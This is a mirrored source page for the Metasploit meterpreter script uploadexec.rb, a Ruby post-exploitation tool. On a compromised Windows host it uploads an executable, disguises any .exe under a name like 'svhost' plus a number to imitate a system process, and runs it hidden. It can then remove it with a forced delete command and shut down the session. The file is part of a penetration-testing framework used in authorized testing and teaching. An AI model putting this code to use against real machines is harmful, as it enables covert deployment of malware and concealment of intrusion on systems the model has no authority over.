Mirror of metasploit
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

uploadexec.rb 3.9KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149
  1. ##
  2. # WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
  3. # If you'd like to improve this script, please try to port it as a post
  4. # module instead. Thank you.
  5. ##
  6. session = client
  7. @@exec_opts = Rex::Parser::Arguments.new(
  8. "-h" => [ false,"Help menu." ],
  9. "-e" => [ true, "Executable or script to upload to target host." ],
  10. "-o" => [ true, "Options for executable." ],
  11. "-p" => [ false,"Path on target to upload executable, default is %TEMP%." ],
  12. "-x" => [ false,"Exit the session once the payload has been run." ],
  13. "-s" => [ true,"Sleep for a number of seconds after uploading before executing." ],
  14. "-v" => [ false,"Verbose, return output of execution of uploaded executable." ],
  15. "-r" => [ false,"Remove the executable after running it (only works if the executable exits right away)" ]
  16. )
  17. ################## function declaration Declarations ##################
  18. def usage()
  19. print_line "UploadExec -- upload a script or executable and run it"
  20. print_line(@@exec_opts.usage)
  21. raise Rex::Script::Completed
  22. end
  23. def upload(session,file,trgloc = "")
  24. if not ::File.exist?(file)
  25. raise "File to Upload does not exists!"
  26. else
  27. if trgloc == ""
  28. location = session.sys.config.getenv('TEMP')
  29. else
  30. location = trgloc
  31. end
  32. begin
  33. ext = file[file.rindex(".") .. -1]
  34. if ext and ext.downcase == ".exe"
  35. fileontrgt = "#{location}\\svhost#{rand(100)}.exe"
  36. else
  37. fileontrgt = "#{location}\\TMP#{rand(100)}#{ext}"
  38. end
  39. print_status("\tUploading #{file}....")
  40. session.fs.file.upload_file("#{fileontrgt}","#{file}")
  41. print_status("\t#{file} uploaded!")
  42. print_status("\tUploaded as #{fileontrgt}")
  43. rescue ::Exception => e
  44. print_status("Error uploading file #{file}: #{e.class} #{e}")
  45. raise e
  46. end
  47. end
  48. return fileontrgt
  49. end
  50. #Function for executing a list of commands
  51. def cmd_on_trgt_exec(session,cmdexe,opt,verbose)
  52. r=''
  53. session.response_timeout=120
  54. if verbose == 1
  55. begin
  56. print_status "\tRunning command #{cmdexe}"
  57. r = session.sys.process.execute(cmdexe, opt, {'Hidden' => true, 'Channelized' => true})
  58. while(d = r.channel.read)
  59. print_status("\t#{d}")
  60. end
  61. r.channel.close
  62. r.close
  63. rescue ::Exception => e
  64. print_status("Error Running Command #{cmdexe}: #{e.class} #{e}")
  65. raise e
  66. end
  67. else
  68. begin
  69. print_status "\trunning command #{cmdexe}"
  70. r = session.sys.process.execute(cmdexe, opt, {'Hidden' => true, 'Channelized' => false})
  71. r.close
  72. rescue ::Exception => e
  73. print_status("Error Running Command #{cmdexe}: #{e.class} #{e}")
  74. raise e
  75. end
  76. end
  77. end
  78. def m_unlink(session, path)
  79. r = session.sys.process.execute("cmd.exe /c del /F /S /Q " + path, nil, {'Hidden' => 'true'})
  80. while(r.name)
  81. select(nil, nil, nil, 0.10)
  82. end
  83. r.close
  84. end
  85. #check for proper Meterpreter Platform
  86. def unsupported
  87. print_error("This version of Meterpreter is not supported with this Script!")
  88. raise Rex::Script::Completed
  89. end
  90. unsupported if client.platform != 'windows'
  91. #parsing of Options
  92. file = ""
  93. cmdopt = nil
  94. helpcall = 0
  95. path = ""
  96. verbose = 0
  97. remove = 0
  98. quit = 0
  99. sleep_sec = nil
  100. @@exec_opts.parse(args) { |opt, idx, val|
  101. case opt
  102. when "-e"
  103. file = val || ""
  104. when "-o"
  105. cmdopt = val
  106. when "-p"
  107. path = val
  108. when "-v"
  109. verbose = 1
  110. when "-h"
  111. helpcall = 1
  112. when "-s"
  113. sleep_sec = val.to_f
  114. when "-r"
  115. remove = 1
  116. when "-x"
  117. quit = 1
  118. end
  119. }
  120. if args.length == 0 || helpcall == 1
  121. usage
  122. end
  123. print_status("Running Upload and Execute Meterpreter script....")
  124. exec = upload(session,file,path)
  125. if sleep_sec
  126. print_status("\tSleeping for #{sleep_sec}s...")
  127. Rex.sleep(sleep_sec)
  128. end
  129. cmd_on_trgt_exec(session,exec,cmdopt,verbose)
  130. if remove == 1
  131. print_status("\tDeleting #{exec}")
  132. m_unlink(session, exec)
  133. end
  134. if quit == 1
  135. print_status("Closing the session...")
  136. session.core.shutdown rescue nil
  137. session.shutdown_passive_dispatcher
  138. end
  139. print_status("Finished!")